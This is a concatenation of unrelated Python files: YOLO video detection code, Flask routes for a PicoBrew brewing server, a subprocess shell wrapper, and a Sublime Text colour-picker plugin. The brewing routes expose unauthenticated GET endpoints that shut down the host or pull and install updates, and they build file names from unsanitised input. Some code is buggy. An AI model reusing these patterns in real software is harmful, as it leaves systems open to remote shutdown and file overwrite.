if not ret:
break
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
original_frames.put(original_image)
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
Frames_data.put(image_data)
while started == False and Frames_data.qsize()>0:
if Processed_frames.qsize() == 0:
time.sleep(0.1)
continue
else:
started = True
start_time = time.time()
break
while True:
if original_frames.qsize() == 0 and Frames_data.qsize() == 0 and Predicted_data.qsize() == 0 and Processed_frames.qsize() == 0 and Processing_times.qsize() == 0 and Final_frames.qsize() == 0:
p1.terminate()
p2.terminate()
p3.terminate()
break
elif Final_frames.qsize()>0:
image = Final_frames.get()
if output_path != '': out.write(image)
end_time = time.time()
print("total_duration", end_time-start_time)
cv2.destroyAllWindows()
# detect from video
def detect_video(Yolo, video_path, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times, times_2 = [], []
SUM = 0
is_first_detection = True
vid = cv2.VideoCapture(video_path)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
while True:
_, img = vid.read()
try:
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
except:
break
image_data = image_preprocess(np.copy(original_image), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
image = draw_bbox(original_image, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_image, bboxes, read_class_names(CLASSES))
t3 = time.time()
times.append(t2-t1)
SUM += (t2-t1)
if is_first_detection == True:
SUM = 0
is_first_detection = False
start_time = time.time()
times_2.append(t3-t1)
times = times[-20:]
times_2 = times_2[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
fps2 = 1000 / (sum(times_2)/len(times_2)*1000)
image = cv2.putText(image, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
#print("Time: {:.2f}ms, Detection FPS: {:.1f}, total FPS: {:.1f}".format(ms, fps, fps2))
if output_path != '': out.write(image)
if show:
cv2.imshow('output', image)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
end_time = time.time()
print(SUM)
print("total_duration", end_time-start_time)
cv2.destroyAllWindows()
# detect from webcam
def detect_realtime(Yolo, output_path, input_size=416, show=False, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
times = []
vid = cv2.VideoCapture(0)
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(output_path, codec, fps, (width, height)) # output_path must be .mp4
while True:
_, frame = vid.read()
try:
original_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
original_frame = cv2.cvtColor(original_frame, cv2.COLOR_BGR2RGB)
except:
break
image_data = image_preprocess(np.copy(original_frame), [input_size, input_size])
image_data = image_data[np.newaxis, ...].astype(np.float32)
t1 = time.time()
if YOLO_FRAMEWORK == "tf":
pred_bbox = Yolo.predict(image_data)
elif YOLO_FRAMEWORK == "trt":
batched_input = tf.constant(image_data)
result = Yolo(batched_input)
pred_bbox = []
for key, value in result.items():
value = value.numpy()
pred_bbox.append(value)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(pred_bbox, original_frame, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
times.append(t2-t1)
times = times[-20:]
ms = sum(times)/len(times)*1000
fps = 1000 / ms
print("Time: {:.2f}ms, {:.1f} FPS".format(ms, fps))
frame = draw_bbox(original_frame, bboxes, CLASSES=CLASSES, rectangle_colors=rectangle_colors)
# CreateXMLfile("XML_Detections", str(int(time.time())), original_frame, bboxes, read_class_names(CLASSES))
image = cv2.putText(frame, "Time: {:.1f}FPS".format(fps), (0, 30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
if output_path != '': out.write(frame)
if show:
cv2.imshow('output', frame)
if cv2.waitKey(25) & 0xFF == ord("q"):
cv2.destroyAllWindows()
break
cv2.destroyAllWindows()
|
routes_frontend.py
|
import json
import os
import requests
import sys
import uuid
from flask import render_template, request, redirect
from threading import Thread
from time import sleep
from . import main
from .recipe_parser import PicoBrewRecipe, PicoBrewRecipeImport, ZymaticRecipe, ZymaticRecipeImport, ZSeriesRecipe
from .session_parser import load_ferm_session, get_ferm_graph_data, get_brew_graph_data, load_brew_session, active_brew_sessions, active_ferm_sessions
from .config import base_path, zymatic_recipe_path, zseries_recipe_path, pico_recipe_path, ferm_archive_sessions_path, brew_archive_sessions_path
# -------- Routes --------
@main.route('/')
def index():
return render_template('index.html', brew_sessions=load_active_brew_sessions(),
ferm_sessions=load_active_ferm_sessions())
@main.route('/restart_server')
def restart_server():
# git pull & install any updated requirements
os.system('cd {0};git pull;pip3 install -r requirements.txt'.format(base_path()))
# TODO: Close file handles for open sessions?
def restart():
sleep(2)
os.execl(sys.executable, *([sys.executable]+sys.argv))
thread = Thread(target=restart, daemon=True)
thread.start()
return redirect('/')
@main.route('/restart_system')
def restart_system():
os.system('shutdown -r now')
# TODO: redirect to a page with alert of restart
return redirect('/')
@main.route('/shutdown_system')
def shutdown_system():
os.system('shutdown -h now')
# TODO: redirect to a page with alert of shutdown
return redirect('/')
@main.route('/brew_history')
def brew_history():
return render_template('brew_history.html', sessions=load_brew_sessions())
@main.route('/ferm_history')
def ferm_history():
return render_template('ferm_history.html', sessions=load_ferm_sessions())
@main.route('/zymatic_recipes')
def _zymatic_recipes():
global zymatic_recipes
zymatic_recipes = load_zymatic_recipes()
recipes_dict = [json.loads(json.dumps(recipe, default=lambda r: r.__dict__)) for recipe in zymatic_recipes]
return render_template('zymatic_recipes.html', recipes=recipes_dict)
@main.route('/new_zymatic_recipe', methods=['GET', 'POST'])
def new_zymatic_recipe():
if request.method == 'POST':
recipe = request.get_json()
recipe['id'] = uuid.uuid4().hex[:32]
filename = zymatic_recipe_path().joinpath('{}.json'.format(recipe['name'].replace(' ', '_')))
if not filename.exists():
with open(filename, "w") as file:
json.dump(recipe, file, indent=4, sort_keys=True)
return '', 204
else:
return 'Recipe Exists!', 418
else:
return render_template('new_zymatic_recipe.html')
@main.route('/import_zymatic_recipe', methods=['GET', 'POST'])
def import_zymatic_recipe():
if request.method == 'POST':
recipes = ''
data = request.get_json()
guid = data['guid']
machine = next((uid for uid in active_brew_sessions if not active_brew_sessions[uid].is_pico), None)
try:
sync_user_uri = 'http://137.117.17.70/API/SyncUSer?user={}&machine={}'.format(guid, machine)
print('DEBUG: import_zymatic_recipe - {}'.format(sync_user_uri))
r = requests.get(sync_user_uri, headers={'host': 'picobrew.com'})
recipes = r.text.strip()
except:
pass
print('DEBUG: Zymatic Recipes Dumped: \"{}\"'.format(recipes))
if len(recipes) > 2 and recipes[0] == '#' and recipes[-1] == '#':
ZymaticRecipeImport(recipes)
return '', 204
else:
return 'Import Failed: \"' + recipes + '\"', 418
else:
return render_template('import_zymatic_recipe.html')
@main.route('/update_zymatic_recipe', methods=['POST'])
def update_zymatic_recipe():
update = request.get_json()
files = list(zymatic_recipe_path().glob("*.json"))
for filename in files:
recipe = load_zymatic_recipe(filename)
if recipe.id == update['id']:
recipe.update_steps(filename, update['steps'])
return '', 204
@main.route('/delete_zymatic_recipe', methods=['GET', 'POST'])
def delete_zymatic_recipe():
recipe_id = request.get_json()
files = list(zymatic_recipe_path().glob("*.json"))
for filename in files:
recipe = load_zymatic_recipe(filename)
if recipe.id == recipe_id:
os.remove(filename)
return '', 204
return 'Delete Recipe: Failed to find recipe id \"' + recipe_id + '\"', 418
def load_zymatic_recipes():
files = list(zymatic_recipe_path().glob("*.json"))
recipes = [load_zymatic_recipe(file) for file in files]
return recipes
def load_zymatic_recipe(file):
recipe = ZymaticRecipe()
recipe.parse(file)
return recipe
def get_zymatic_recipes():
global zymatic_recipes
return zymatic_recipes
@main.route('/zseries_recipes')
def _zseries_recipes():
global zseries_recipes
zseries_recipes = load_zseries_recipes()
recipes_dict = [json.loads(json.dumps(recipe, default=lambda r: r.__dict__)) for recipe in zseries_recipes]
return render_template('zseries_recipes.html', recipes=recipes_dict)
@main.route('/new_zseries_recipe')
def new_zseries_recipe():
return render_template('new_zseries_recipe.html')
@main.route('/new_zseries_recipe_save', methods=['POST'])
def new_zseries_recipe_save():
recipe = request.get_json()
recipe['id'] = increment_zseries_recipe_id()
recipe['start_water'] = 13.1
filename = zseries_recipe_path().joinpath('{}.json'.format(recipe['name'].replace(' ', '_')))
if not filename.exists():
with open(filename, "w") as file:
json.dump(recipe, file, indent=4, sort_keys=True)
return '', 204
else:
return 'Recipe Exists!', 418
@main.route('/update_zseries_recipe', methods=['POST'])
def update_zseries_recipe():
update = request.get_json()
files = list(zseries_recipe_path().glob("*.json"))
for filename in files:
recipe = load_zseries_recipe(filename)
if str(recipe.id) == update['id']:
recipe.update_steps(filename, update['steps'])
return '', 204
@main.route('/delete_zseries_recipe', methods=['GET', 'POST'])
def delete_zseries_recipe():
recipe_id = request.get_json()
files = list(zseries_recipe_path().glob("*.json"))
for filename in files:
recipe = load_zseries_recipe(filename)
if str(recipe.id) == recipe_id:
os.remove(filename)
return '', 204
return 'Delete Recipe: Failed to find recipe id \"' + recipe_id + '\"', 418
def load_zseries_recipes():
files = list(zseries_recipe_path().glob("*.json"))
recipes = [load_zseries_recipe(file) for file in files]
return recipes
def load_zseries_recipe(file):
recipe = ZSeriesRecipe()
recipe.parse(file)
return recipe
def get_zseries_recipes():
global zseries_recipes
return zseries_recipes
@main.route('/pico_recipes')
def _pico_recipes():
global pico_recipes
pico_recipes = load_pico_recipes()
recipes_dict = [json.loads(json.dumps(recipe, default=lambda r: r.__dict__)) for recipe in pico_recipes]
return render_template('pico_recipes.html', recipes=recipes_dict)
@main.route('/new_pico_recipe', methods=['GET', 'POST'])
def new_pico_recipe():
if request.method == 'POST':
recipe = request.get_json()
recipe['id'] = uuid.uuid4().hex[:14]
recipe[
'image'] = '000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000fffe000ffc01ffffc0000000000000003fff0003f601ff7ff0000000000000000fe7c00dff003de7f8000800030000000ff3e000ff801ff7f80078001fe000000dfbe000ff801feff80070001fe0000009c37000de000dffc0007803ffe0000021c070001c000cbf80007803ffe000000dcbf800dc0002ff0000780ffff000000fc9f800fc0003fe00007a3ffff800003fc1f800fc0000dc00007ffffff000003fc3f801dc0000fc00007f1f8bf000002bcb7800dc0000dc00007f0f9fffc00003c278001c00021c00007f079ff0600023c0f8021c00021c00007fe10fe0200003c1f8001c00021c00007e000ff00000c1c3f00c1c000c1c00007e080ff00000000fe0080600000600007e010ff00000ffffc00fff000fff00007e001ff00000ffff800fff800fff80007e001ff000007ffe0007ff8003ff80007f000fe00000000000000000000000007f001fe00fffe03fff003fffcfffbff87f001fe001fffc0ffff03fffcffffffc7e0007e00cfff633c3f807e3e1cfdede7e0017e006fffb13f9fc03f9f3dfdefe7e0017e000ffff8bfefc03fdf3cffe7e7e0017e0007eef8b7ffe037df1cfdf787f0017e0001e6bc87a7e0073f18f8ff07f0017e0005cc3c841bf02fbf1aefff07f8dffe02070d7c3c3ff030df1e4ece07fdffff8c24067c303fe0ffe00e0e4e07fdffff003df778f79bc0ffe00f1f0e07fddffe010dff30bfcdf0afec0f1f0e07fc08ff7015fd38afedb82fce0f1e1e07fffffe0001e4388f21bc8f0f061e1c07fffffc0001e03c8f203c0f4f061e1c07e0017c0061f07f07003d078f063e1c07c0003e000000fe01987c000f033f1c03e0007c00ffffffffcfffffff03fff800ff9ff000fffffbffeffbffff03fbf800000000007fffe1ffe3f1ffff00f9f800000000001fff00ffc0c0fffe007070000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
filename = pico_recipe_path().joinpath('{}.json'.format(recipe['name'].replace(' ', '_')))
if not filename.exists():
with open(filename, "w") as file:
json.dump(recipe, file, indent=4, sort_keys=True)
return '', 204
else:
return 'Recipe Exists!', 418
else:
return render_template('new_pico_recipe.html')
@main.route('/import_pico_recipe', methods=['GET', 'POST'])
def import_pico_recipe():
if request.method == 'POST':
recipe = ''
data = request.get_json()
rfid = data['rfid']
uid = next((uid for uid in active_brew_sessions if active_brew_sessions[uid].is_pico), None)
try:
get_recipes_uri = 'http://137.117.17.70/API/pico/getRecipe?uid={}&rfid={}&ibu=-1&abv=-1.0'.format(uid, rfid)
print('DEBUG: import_pico_recipe - {}'.format(get_recipes_uri))
r = requests.get(get_recipes_uri, headers={'host': 'picobrew.com'})
recipe = r.text.strip()
except:
pass
print('DEBUG: Pico Recipe Dumped: \"{}\"'.format(recipe))
if len(recipe) > 2 and recipe[0] == '#' and recipe[-1] == '#' and recipe != '#Invalid|#':
PicoBrewRecipeImport(recipe, rfid)
return '', 204
else:
return 'Import Failed: \"' + recipe + '\"', 418
else:
return render_template('import_pico_recipe.html')
@main.route('/update_pico_recipe', methods=['POST'])
def update_pico_recipe():
update = request.get_json()
files = list(pico_recipe_path().glob("*.json"))
for filename in files:
recipe = load_pico_recipe(filename)
if recipe.id == update['id']:
recipe.update_steps(filename, update['steps'])
return '', 204
@main.route('/delete_pico_recipe', methods=['GET', 'POST'])
def delete_pico_recipe():
recipe_id = request.get_json()
files = list(pico_recipe_path().glob("*.json"))
for filename in files:
recipe = load_pico_recipe(filename)
if recipe.id == recipe_id:
os.remove(filename)
return '', 204
return 'Delete Recipe: Failed to find recipe id \"' + recipe_id + '\"', 418
def load_pico_recipes():
files = list(pico_recipe_path().glob("*.json"))
recipes = [load_pico_recipe(file) for file in files]
return recipes
def load_pico_recipe(file):
recipe = PicoBrewRecipe()
recipe.parse(file)
return recipe
def get_pico_recipes():
global pico_recipes
return pico_recipes
def load_active_brew_sessions():
brew_sessions = []
# process brew_sessions from memory
for uid in active_brew_sessions:
brew_sessions.append({'alias': active_brew_sessions[uid].alias,
'graph': get_brew_graph_data(uid, active_brew_sessions[uid].name,
active_brew_sessions[uid].step,
active_brew_sessions[uid].data,
active_brew_sessions[uid].is_pico)})
return brew_sessions
def load_brew_sessions(uid=None):
files = []
if uid:
files = list(brew_archive_sessions_path().glob("*#{}*.json".format(uid)))
else:
files = list(brew_archive_sessions_path().glob("*.json"))
brew_sessions = [load_brew_session(file) for file in files]
return brew_sessions
def load_active_ferm_sessions():
ferm_sessions = []
for uid in active_ferm_sessions:
ferm_sessions.append({'alias': active_ferm_sessions[uid].alias,
'graph': get_ferm_graph_data(uid, active_ferm_sessions[uid].voltage,
active_ferm_sessions[uid].data)})
return ferm_sessions
def load_ferm_sessions():
files = list(ferm_archive_sessions_path().glob("*.json"))
ferm_sessions = [load_ferm_session(file) for file in files]
return ferm_sessions
# Read initial recipe list on load
pico_recipes = []
zymatic_recipes = []
zseries_recipes = []
def initialize_data():
global pico_recipes, zymatic_recipes, zseries_recipes
global brew_sessions
# Read initial recipe list on load
pico_recipes = load_pico_recipes()
zymatic_recipes = load_zymatic_recipes()
zseries_recipes = load_zseries_recipes()
# load all archive brew sessions
brew_sessions = load_active_brew_sessions()
# todo: if anything in ferm/active folder, load data in since the server probably crashed?
# utilities
def increment_zseries_recipe_id():
recipe_id = -1
for r in get_zseries_recipes():
if r.id > recipe_id:
recipe_id = r.id
return recipe_id + 1
|
localshell.py
|
from subprocess import Popen, PIPE
from .abstractshell import AbstractShell
from .shellresult import ShellResult
from .streamreader import StandardStreamReader
from .queue import Queue
from threading import Thread
from shutil import copyfile
from os import chmod, stat, environ
from logging import CRITICAL
class LocalShell(AbstractShell):
def __init__(self, check_xc=False, check_err=False, wait=True, log_level=CRITICAL, **kwargs):
AbstractShell.__init__(self, check_xc=check_xc, check_err=check_err,
wait=wait, log_level=log_level, **kwargs)
self.update(environ)
def execute_command(self, command, env={}, wait=True, check_err=False, cwd=None):
process = Popen(command, env=env, shell=True, stdout=PIPE, stderr=PIPE, cwd=cwd)
queue = Queue()
StandardStreamReader(process.stdout, 1, queue)
StandardStreamReader(process.stderr, 2, queue)
def post_process_exit_code():
queue.put( (0, process.wait()) )
queue.put( (0, None) )
Thread(target=post_process_exit_code).start()
return ShellResult(self, command, queue, wait, check_err)
def do_pull(self, local_path, remote_path):
copyfile(remote_path, local_path)
def do_push(self, local_path, remote_path):
copyfile(local_path, remote_path)
|
sublimecp.py
|
import sublime
import sublime_plugin
import subprocess
import os
import threading
from stat import *
sublime_version = 2
if not sublime.version() or int(sublime.version()) > 3000:
sublime_version = 3
if sublime.platform() == 'windows':
import ctypes
from ctypes import c_int32, c_uint32, c_void_p, c_wchar_p, POINTER
class CHOOSECOLOR(ctypes.Structure):
_fields_ = [('lStructSize', c_uint32),
('hwndOwner', c_void_p),
('hInstance', c_void_p),
('rgbResult', c_uint32),
('lpCustColors', POINTER(c_uint32)),
('Flags', c_uint32),
('lCustData', c_void_p),
('lpfnHook', c_void_p),
('lpTemplateName', c_wchar_p)]
class POINT(ctypes.Structure):
_fields_ = [('x', c_int32),
('y', c_int32)]
CustomColorArray = c_uint32 * 16
CC_SOLIDCOLOR = 0x80
CC_RGBINIT = 0x01
CC_FULLOPEN = 0x02
ChooseColorW = ctypes.windll.Comdlg32.ChooseColorW
ChooseColorW.argtypes = [POINTER(CHOOSECOLOR)]
ChooseColorW.restype = c_int32
GetDC = ctypes.windll.User32.GetDC
GetDC.argtypes = [c_void_p]
GetDC.restype = c_void_p
ReleaseDC = ctypes.windll.User32.ReleaseDC
ReleaseDC.argtypes = [c_void_p, c_void_p] # hwnd, hdc
ReleaseDC.restype = c_int32
GetCursorPos = ctypes.windll.User32.GetCursorPos
GetCursorPos.argtypes = [POINTER(POINT)] # POINT
GetCursorPos.restype = c_int32
GetPixel = ctypes.windll.Gdi32.GetPixel
GetPixel.argtypes = [c_void_p, c_int32, c_int32] # hdc, x, y
GetPixel.restype = c_uint32 # colorref
def get_pixel():
hdc = GetDC(0)
pos = POINT()
GetCursorPos(ctypes.byref(pos))
val = GetPixel(hdc, pos.x, pos.y)
ReleaseDC(0, hdc)
return val
def to_custom_color_array(custom_colors):
cc = CustomColorArray()
for i in range(16):
cc[i] = int(custom_colors[i])
return cc
def from_custom_color_array(custom_colors):
cc = [0] * 16
for i in range(16):
cc[i] = str(custom_colors[i])
return cc
def bgr_to_hexstr(bgr, byte_table=list(['{0:02X}'.format(b) for b in range(256)])):
# 0x00BBGGRR
b = byte_table[(bgr >> 16) & 0xff]
g = byte_table[(bgr >> 8) & 0xff]
r = byte_table[(bgr) & 0xff]
return (r + g + b)
def hexstr_to_bgr(hexstr):
if len(hexstr) == 3:
hexstr = hexstr[0] + hexstr[0] + hexstr[1] + hexstr[1] + hexstr[2] + hexstr[2]
r = int(hexstr[0:2], 16)
g = int(hexstr[2:4], 16)
b = int(hexstr[4:6], 16)
return (b << 16) | (g << 8) | r
def win_pick(window, starting_color):
paste = None
start_color = None
if starting_color is not None:
start_color = hexstr_to_bgr(starting_color[1:])
s = sublime.load_settings("ColorPicker.sublime-settings")
custom_colors = s.get("custom_colors", ['0'] * 16)
if len(custom_colors) < 16:
custom_colors = ['0'] * 16
s.set('custom_colors', custom_colors)
cc = CHOOSECOLOR()
ctypes.memset(ctypes.byref(cc), 0, ctypes.sizeof(cc))
cc.lStructSize = ctypes.sizeof(cc)
if sublime_version == 2:
cc.hwndOwner = window.hwnd()
else:
# Temporary fix for Sublime Text 3 - For some reason the hwnd crashes it
# Of course, clicking out of the colour picker and into Sublime will make
# Sublime not respond, but as soon as you exit the colour picker it's ok
cc.hwndOwner = None
cc.Flags = CC_SOLIDCOLOR | CC_FULLOPEN | CC_RGBINIT
cc.rgbResult = c_uint32(start_color) if not paste and start_color else get_pixel()
cc.lpCustColors = to_custom_color_array(custom_colors)
if ChooseColorW(ctypes.byref(cc)):
color = bgr_to_hexstr(cc.rgbResult)
else:
color = None
return color
class ColorPicker(object):
# SVG Colors spec: http://www.w3.org/TR/css3-color/#svg-color
SVGColors = {
"aliceblue": "F0F8FF",
"antiquewhite": "FAEBD7",
"aqua": "00FFFF",
"aquamarine": "7FFFD4",
"azure": "F0FFFF",
"beige": "F5F5DC",
"bisque": "FFE4C4",
"black": "000000",
"blanchedalmond": "FFEBCD",
"blue": "0000FF",
"blueviolet": "8A2BE2",
"brown": "A52A2A",
"burlywood": "DEB887",
"cadetblue": "5F9EA0",
"chartreuse": "7FFF00",
"chocolate": "D2691E",
"coral": "FF7F50",
"cornflowerblue": "6495ED",
"cornsilk": "FFF8DC",
"crimson": "DC143C",
"cyan": "00FFFF",
"darkblue": "00008B",
"darkcyan": "008B8B",
"darkgoldenrod": "B8860B",
"darkgray": "A9A9A9",
"darkgreen": "006400",
"darkgrey": "A9A9A9",
"darkkhaki": "BDB76B",
"darkmagenta": "8B008B",
"darkolivegreen": "556B2F",
"darkorange": "FF8C00",
"darkorchid": "9932CC",
"darkred": "8B0000",
"darksalmon": "E9967A",
"darkseagreen": "8FBC8F",
"darkslateblue": "483D8B",
"darkslategray": "2F4F4F",
"darkslategrey": "2F4F4F",
"darkturquoise": "00CED1",
"darkviolet": "9400D3",
"deeppink": "FF1493",
"deepskyblue": "00BFFF",
"dimgray": "696969",
"dimgrey": "696969",
"dodgerblue": "1E90FF",
"firebrick": "B22222",
"floralwhite": "FFFAF0",
"forestgreen": "228B22",
"fuchsia": "FF00FF",
"gainsboro": "DCDCDC",
"ghostwhite": "F8F8FF",
"gold": "FFD700",
"goldenrod": "DAA520",
"gray": "808080",
"green": "008000",
"greenyellow": "ADFF2F",
"grey": "808080",
"honeydew": "F0FFF0",
"hotpink": "FF69B4",
"indianred": "CD5C5C",
"indigo": "4B0082",
"ivory": "FFFFF0",
"khaki": "F0E68C",
"lavender": "E6E6FA",
"lavenderblush": "FFF0F5",
"lawngreen": "7CFC00",
"lemonchiffon": "FFFACD",
"lightblue": "ADD8E6",
"lightcoral": "F08080",
"lightcyan": "E0FFFF",
"lightgoldenrodyellow": "FAFAD2",
"lightgray": "D3D3D3",
"lightgreen": "90EE90",
"lightgrey": "D3D3D3",
"lightpink": "FFB6C1",
"lightsalmon": "FFA07A",
"lightseagreen": "20B2AA",
"lightskyblue": "87CEFA",
"lightslategray": "778899",
"lightslategrey": "778899",
"lightsteelblue": "B0C4DE",
"lightyellow": "FFFFE0",
"lime": "00FF00",
"limegreen": "32CD32",
"linen": "FAF0E6",
"magenta": "FF00FF",
"maroon": "800000",
"mediumaquamarine": "66CDAA",
"mediumblue": "0000CD",
"mediumorchid": "BA55D3",
"mediumpurple": "9370DB",
"mediumseagreen": "3CB371",
"mediumslateblue": "7B68EE",
"mediumspringgreen": "00FA9A",
"mediumturquoise": "48D1CC",
"mediumvioletred": "C71585",
"midnightblue": "191970",
"mintcream": "F5FFFA",
"mistyrose": "FFE4E1",
"moccasin": "FFE4B5",
"navajowhite": "FFDEAD",
"navy": "000080",
"oldlace": "FDF5E6",
"olive": "808000",
"olivedrab": "6B8E23",
"orange": "FFA500",
"orangered": "FF4500",
"orchid": "DA70D6",
"palegoldenrod": "EEE8AA",
"palegreen": "98FB98",
"paleturquoise": "AFEEEE",
"palevioletred": "DB7093",
"papayawhip": "FFEFD5",
"peachpuff": "FFDAB9",
"peru": "CD853F",
"pink": "FFC0CB",
"plum": "DDA0DD",
"powderblue": "B0E0E6",
"purple": "800080",
"red": "FF0000",
"rosybrown": "BC8F8F",
"royalblue": "4169E1",
"saddlebrown": "8B4513",
"salmon": "FA8072",
"sandybrown": "F4A460",
"seagreen": "2E8B57",
"seashell": "FFF5EE",
"sienna": "A0522D",
"silver": "C0C0C0",
"skyblue": "87CEEB",
"slateblue": "6A5ACD",
"slategray": "708090",
"slategrey": "708090",
"snow": "FFFAFA",
"springgreen": "00FF7F",
"steelblue": "4682B4",
"tan": "D2B48C",
"teal": "008080",
"thistle": "D8BFD8",
"tomato": "FF6347",
"turquoise": "40E0D0",
"violet": "EE82EE",
"wheat": "F5DEB3",
"white": "FFFFFF",
"whitesmoke": "F5F5F5",
"yellow": "FFFF00",
"yellowgreen": "9ACD32"
}
def pick(self, window, starting_color=None):
start_color = None
start_color_osx = None
win_use_new_picker = False
if starting_color is not None:
svg_color_hex = self.SVGColors.get(starting_color, None)
if svg_color_hex is not None:
starting_color = svg_color_hex
if self.is_valid_hex_color(starting_color):
start_color = "#" + starting_color
start_color_osx = starting_color
if sublime.platform() == 'windows':
s = sublime.load_settings("ColorPicker.sublime-settings")
win_use_new_picker = s.get('win_use_new_picker', True)
if win_use_new_picker:
args = [os.path.join(sublime.packages_path(), binpath)]
if start_color:
args.append(start_color)
else:
color = win_pick(window, start_color)
elif sublime.platform() == 'osx':
args = [os.path.join(sublime.packages_path(), binpath)]
if start_color_osx:
args.append('-startColor')
args.append(start_color_osx)
else:
args = [os.path.join(sublime.packages_path(), binpath)]
if start_color:
args.append(start_color)
if sublime.platform() != "windows" or win_use_new_picker:
proc = subprocess.Popen(args, stdout=subprocess.PIPE)
color = proc.communicate()[0].strip()
if color:
if (
sublime.platform() != 'windows' or
win_use_new_picker or
sublime_version == 2
):
color = color.decode('utf-8')
# New win_Colorpicker.exe has return hex color code and alpha code. (ex: #FF0000FF = Red color + transparency 100%)
# Only applied to 'win_colorpicker.exe'.
if color == "CANCEL": # When canceled.
color = ""
else:
color = color.replace('#','')[:6]
return color
def is_valid_hex_color(self, s):
if s.startswith('0x'):
s = s[2:]
if len(s) not in (3, 6):
return False
try:
return 0 <= int(s, 16) <= 0xffffff
except ValueError:
return False
class ColorPickApiGetColorCommand(sublime_plugin.WindowCommand):
def run(self, settings, default_color=None):
prefix = '#'
if default_color is not None:
if default_color.startswith('#'):
default_color = default_color[1:]
elif default_color.startswith('0x'):
prefix = '0x'
default_color = default_color[2:]
s = sublime.load_settings(settings)
color = ColorPicker().pick(self.window, default_color)
s.set('color_pick_return', prefix + color if color else None)
class ColorPickApiGetColorAsyncCommand(sublime_plugin.WindowCommand):
def run(self, settings, default_color=None):
prefix = '#'
if default_color is not None:
if default_color.startswith('#'):
default_color = default_color[1:]
elif default_color.startsWith('0x'):
prefix = '0x'
default_color = default_color[2:]
s = sublime.load_settings(settings)
def worker():
color = ColorPicker().pick(self.window, default_color)
s.set('color_pick_return', prefix + color if color else None)
class ColorPickApiIsAvailableCommand(sublime_plugin.ApplicationCommand):
def run(self, settings):
s = sublime.load_settings(settings)
s.set('color_pick_return', True)
# cannot use edit objects in separate threads, so we need a helper command
class ColorPickReplaceRegionsHelperCommand(sublime_plugin.TextCommand):
def run(self, edit, color):
def replaceRegionsRecursion():
regions = self.view.get_regions('ColorPick')
if not regions:
return
region = regions[0]
self.view.erase_regions('ColorPick')
self.view.add_regions('ColorPick', regions[1:])
self.view.replace(edit, region, color)
replaceRegionsRecursion()
replaceRegionsRecursion() # we change where the text points refer, so we have to replace one, and then refetch the locations
class ColorPickCommand(sublime_plugin.TextCommand):
def run(self, edit):
sel = self.view.sel()
selected = None
prefix = '#'
# get the currently selected color - if any
if len(sel) > 0:
selected = self.view.substr(self.view.word(sel[0])).strip()
if selected.startswith('#'):
selected = selected[1:]
elif selected.startswith('0x'):
selected = selected[2:]
prefix = '0x'
cp = ColorPicker()
regions = []
# remember all regions to replace later
for region in sel:
word = self.view.word(region)
# if the selected word is a valid color, remember it
if cp.is_valid_hex_color(self.view.substr(word)):
# include '#' if present
if prefix == '#' and self.view.substr(word.a - 1) == '#':
word = sublime.Region(word.a - 1, word.b)
# A "0x" prefix is considered part of the word and is included anyway
# remember
regions.append(word)
# otherwise just remember the selected region
else:
regions.append(region)
self.view.erase_regions('ColorPick')
self.view.add_regions('ColorPick', regions)
def worker():
color = cp.pick(self.view.window(), selected)
if color:
# Determine user preference for case of letters (default upper)
s = sublime.load_settings("ColorPicker.sublime-settings")
upper_case = s.get("color_upper_case", True)
if upper_case:
color = color.upper()
else:
color = color.lower()
self.view.run_command('color_pick_replace_regions_helper', {'color': prefix+color})
threading.Thread(target=worker).start()
libdir = os.path.join('ColorPicker', 'lib')
if sublime.platform() == 'osx':
